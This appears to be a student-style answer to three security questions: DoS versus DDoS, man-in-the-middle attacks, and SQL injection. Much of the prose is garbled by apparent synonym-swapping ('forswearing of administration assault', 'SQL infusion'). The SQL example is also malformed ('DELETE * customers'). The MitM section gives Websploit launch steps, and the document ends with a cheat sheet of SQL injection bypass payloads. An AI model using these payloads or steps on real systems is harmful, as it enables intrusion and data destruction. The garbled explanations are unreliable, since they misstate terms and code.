Question

1. Explain the difference between Denial-of-Service and Distributed Denial-of-Service attacks. Why is the latter much more damaging?
2. What is a Man-in-the-Middle attack? Describe how one may be launched.
3. Describe how a SQL injection attack works and ways to mitigate one.

Answer 1

Answer 1
************

A DoS assault is a forswearing of administration assault where a PC (or PCs) is utilized to flood a server with TCP and UDP bundles. Amid this kind of assault, the administration is put out of activity as the parcels sent over-burden the server's capacities and make the server inaccessible to different gadgets and clients all through the system. DoS assaults are utilized to close down individual machines and systems with the goal that they can't be utilized by different clients.

Attacks
*********
Buffer overflow attacks
Ping of Death or ICMP flood
SYN flood
Teardrop Attack

A DDoS assault is a standout amongst the most well-known kinds of DoS assault being used today. Amid a DoS assault, various frameworks focus on a solitary framework with a DoS assault. The focused on system is then besieged with parcels from numerous areas. By utilizing numerous areas to assault the framework the aggressor can put the framework disconnected all the more effectively. The explanation behind this is there is a bigger number of machines at the aggressors' transfer and it winds up troublesome for the unfortunate casualty to pinpoint the birthplace of the assault.

Attacks
*********
UDP Floods
Ping Flood
SYN Flood
Slowloris
HTTP Flood
Zero-Day Attacks

Answer 2
************

A man-in-the-center assault is completed by programmers to embed their quality in the middle of the correspondence of two gatherings to access all the data sent to and from both the gatherings. The programmer can prevent the clients from sending and getting information, or may even occupy and divert the messages to another client. The primary goal of Man-in-the-Middle assault is to spy the clients' discussion, concealing their essence, influencing it to show up so typical as though there is no third individual associated with the correspondence.

1) Install Websploit

2) Launch Websploit

3) Select the MitM Module
show modules
use network/mitm
4) Set the Options
5) Run the Attack!

Now if the target navigates to a website, we will see it appear in our console!

Answer 3
***********

SQL infusion is a web security powerlessness that enables an aggressor to meddle with the questions that an application makes to its database. It by and large enables an assailant to see information that they are not ordinarily ready to recover. This may incorporate information having a place with different clients, or whatever other information that the application itself can get to. As a rule, an assailant can adjust or erase this information, making determined changes the application's substance or conduct.

The back-end database query might look something like this:

SELECT * FROM customers WHERE customer_id = '1234567'

Suppose a user entered the following customer_id in a web form field:

1234567; DELETE * customers WHERE '1' = '1

The back-end database would then obediently execute the following SQL:

SELECT * FROM customers WHERE customer_id = '1234567';

DELETE * FROM customers WHERE 'x' = 'x'

databases will happily execute multiple SQL statements in a row if separated by a semicolon. Failure to sanitize the user input for the single quote "'" character makes it possible for an attacker to delete the entire table.

Cheetsheet
**************

injection
==========

' or '1'='1
' or '1'='1' -- '
' or '1'='1' ({ '
' or '1'='1' /* '

' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

'or'1=1'

above cheat sheet will work on sql injection with vulnerable to database design.

Thanks